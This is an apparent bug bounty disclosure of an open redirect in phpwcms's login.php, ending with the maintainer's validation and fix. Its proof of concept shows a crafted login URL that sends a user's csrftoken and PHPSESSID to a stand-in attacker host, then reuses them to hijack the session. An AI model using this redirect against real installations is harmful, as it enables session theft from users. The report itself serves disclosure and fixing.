Open Redirect in slackero/phpwcms

Valid

Reported on

Aug 12th 2021


✍️ Description

Session hijacking via open redirection

🕵️‍♂️ Proof of Concept

Steps to reproduce
1. Go to http://your-domain.tld/login.php?ref=http://attackers-domain.tld/?
2. Login to a valid account
3. You will be redirected to http://attackers-domain.tld/?&csrftoken=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&PHPSESSID=yyyyyyyyyyyyyyyy

💥 Impact

This vulnerability allows an attacker to steal csrftoken and PHPSESSID.

When the attacker goes to http://your-domain.tld/phpwcms.php?csrftoken=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&PHPSESSID=yyyyyyyyyyyyyyyy, the valid user's session will be hijacked.

📍 Location login.php#L81 login.php#L243

bAu modified the report
a year ago
bAu modified the report
a year ago
bAu modified the report
a year ago
bAu modified the report
a year ago
bAu modified the report
a year ago
We have contacted a member of the slackero/phpwcms team and are waiting to hear back a year ago
slackero/phpwcms maintainer validated this vulnerability a year ago
bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
slackero/phpwcms maintainer confirmed that a fix has been merged on 45171f a year ago
The fix bounty has been dropped
to join this conversation